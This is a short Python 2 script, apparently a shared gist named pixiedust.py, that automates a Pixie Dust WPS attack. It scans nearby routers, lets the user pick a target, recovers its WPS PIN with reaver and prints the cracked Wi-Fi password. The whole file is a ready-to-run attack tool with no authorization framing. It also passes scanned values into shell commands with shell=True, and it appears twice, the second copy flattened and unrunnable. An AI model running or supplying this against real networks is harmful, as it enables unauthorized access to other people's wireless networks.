joaovarelas/pixiedust.py

## pixiedust.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess


# GUI for PixieWPS
print '''
██████╗ ██╗██╗  ██╗██╗███████╗    ██╗    ██╗██████╗ ███████╗
██╔══██╗██║╚██╗██╔╝██║██╔════╝    ██║    ██║██╔══██╗██╔════╝
██████╔╝██║ ╚███╔╝ ██║█████╗      ██║ █╗ ██║██████╔╝███████╗
██╔═══╝ ██║ ██╔██╗ ██║██╔══╝      ██║███╗██║██╔═══╝ ╚════██║
██║     ██║██╔╝ ██╗██║███████╗    ╚███╔███╔╝██║     ███████║
╚═╝     ╚═╝╚═╝  ╚═╝╚═╝╚══════╝     ╚══╝╚══╝ ╚═╝     ╚══════╝
'''


def exec_cmd(cmd):
    return subprocess.check_output(cmd, shell=True)

def get_interface():
    print "[+] Getting current interface name..."
    iface = exec_cmd("route | grep default | awk '{print $8}'")
    return iface.strip()

def mon_mode(iface):
    print "[+] Enabling monitor mode on " + iface
    cmd = exec_cmd("sudo airmon-ng start " + iface)
    iface_mon = iface+"mon"
    return iface_mon

def stop_mon(iface):
    print "[+] Stopping monitor mode on " + iface
    cmd = "sudo airmon-ng stop " + iface
    mon = exec_cmd(cmd)


def find_targets(iface):
    print "[+] Scanning for WPS targets, please wait..."
    timeout = 20 # Seconds Scanning
    cmd = "sudo timeout "+str(timeout)+" sudo wash -s -n 1 -i " + iface
    try:
        targets = exec_cmd(cmd)
    except subprocess.CalledProcessError as e: #exit status bug
        targets = e.output

    # Remove headers
    targets = targets.split("\n")
    targets.pop(0)
    targets.pop(0)
    targets.pop()
    return targets


def exploit(iface_mon, targets, tid):
    tid -= 1
    essid = targets[tid].split()[6]
    bssid = targets[tid].split()[0]
    chan = targets[tid].split()[1]
    print "\n[+] Attacking " + essid
    cmd = "sudo reaver -i "+iface_mon+" -b "+bssid+" -c "+chan+" -vvv -K 1 -f"
    reaver = exec_cmd(cmd)
    reaver = [line for line in reaver.split("\n") if "pin:" in line]
    if not reaver:
        print "[-] WPS Pin not found :("
        exit()

    pin = reaver[0].split(':')[1].strip()
    print "[+] Pin Found: " + pin
    print "[+] Cracking WiFi Key..."
    cmd = "sudo reaver -i "+iface_mon+" -b "+bssid+" -c "+chan+" -s y -vvv -p "+pin
    reaver = exec_cmd(cmd)
    reaver = reaver.split("\n")
    for l in reaver:
        if "Pin cracked " in l:
            print "\n\n[*] WiFi Key sucessfully cracked!!!"

    key = [line for line in reaver if "PSK:" in line]
    key = key[0].split(':')[1].strip()

    print "[*] "+essid+" -> "+key


def main():
    iface = get_interface()
    iface_mon = mon_mode(iface)
    targets = find_targets(iface_mon)

    if not targets:
        print "\n[-] No targets found :("
        exit()
    else:
        print "\n[+] Targets found!"
        i = 1
        for t in targets:
            essid = t.split()[6]
            print "%d : %s" % (i, essid)
            i += 1

    tid = int(input("\n[?] Choose a target: "))
    exploit(iface_mon, targets, tid)


if __name__ == "__main__":
    main()
	#!/usr/bin/env python
	# -- coding: utf-8 --
	import subprocess


	# GUI for PixieWPS
	print '''
	██████╗ ██╗██╗ ██╗██╗███████╗ ██╗ ██╗██████╗ ███████╗
	██╔══██╗██║╚██╗██╔╝██║██╔════╝ ██║ ██║██╔══██╗██╔════╝
	██████╔╝██║ ╚███╔╝ ██║█████╗ ██║ █╗ ██║██████╔╝███████╗
	██╔═══╝ ██║ ██╔██╗ ██║██╔══╝ ██║███╗██║██╔═══╝ ╚════██║
	██║ ██║██╔╝ ██╗██║███████╗ ╚███╔███╔╝██║ ███████║
	╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚══════╝ ╚══╝╚══╝ ╚═╝ ╚══════╝
	'''


	def exec_cmd(cmd):
	return subprocess.check_output(cmd, shell=True)

	def get_interface():
	print "[+] Getting current interface name..."
	iface = exec_cmd("route \| grep default \| awk '{print $8}'")
	return iface.strip()

	def mon_mode(iface):
	print "[+] Enabling monitor mode on " + iface
	cmd = exec_cmd("sudo airmon-ng start " + iface)
	iface_mon = iface+"mon"
	return iface_mon

	def stop_mon(iface):
	print "[+] Stopping monitor mode on " + iface
	cmd = "sudo airmon-ng stop " + iface
	mon = exec_cmd(cmd)


	def find_targets(iface):
	print "[+] Scanning for WPS targets, please wait..."
	timeout = 20 # Seconds Scanning
	cmd = "sudo timeout "+str(timeout)+" sudo wash -s -n 1 -i " + iface
	try:
	targets = exec_cmd(cmd)
	except subprocess.CalledProcessError as e: #exit status bug
	targets = e.output

	# Remove headers
	targets = targets.split("\n")
	targets.pop(0)
	targets.pop(0)
	targets.pop()
	return targets


	def exploit(iface_mon, targets, tid):
	tid -= 1
	essid = targets[tid].split()[6]
	bssid = targets[tid].split()[0]
	chan = targets[tid].split()[1]
	print "\n[+] Attacking " + essid
	cmd = "sudo reaver -i "+iface_mon+" -b "+bssid+" -c "+chan+" -vvv -K 1 -f"
	reaver = exec_cmd(cmd)
	reaver = [line for line in reaver.split("\n") if "pin:" in line]
	if not reaver:
	print "[-] WPS Pin not found :("
	exit()

	pin = reaver[0].split(':')[1].strip()
	print "[+] Pin Found: " + pin
	print "[+] Cracking WiFi Key..."
	cmd = "sudo reaver -i "+iface_mon+" -b "+bssid+" -c "+chan+" -s y -vvv -p "+pin
	reaver = exec_cmd(cmd)
	reaver = reaver.split("\n")
	for l in reaver:
	if "Pin cracked " in l:
	print "\n\n[*] WiFi Key sucessfully cracked!!!"

	key = [line for line in reaver if "PSK:" in line]
	key = key[0].split(':')[1].strip()

	print "[*] "+essid+" -> "+key



	def main():
	iface = get_interface()
	iface_mon = mon_mode(iface)
	targets = find_targets(iface_mon)

	if not targets:
	print "\n[-] No targets found :("
	exit()
	else:
	print "\n[+] Targets found!"
	i = 1
	for t in targets:
	essid = t.split()[6]
	print "%d : %s" % (i, essid)
	i += 1

	tid = int(input("\n[?] Choose a target: "))
	exploit(iface_mon, targets, tid)




	if __name__ == "__main__":
	main()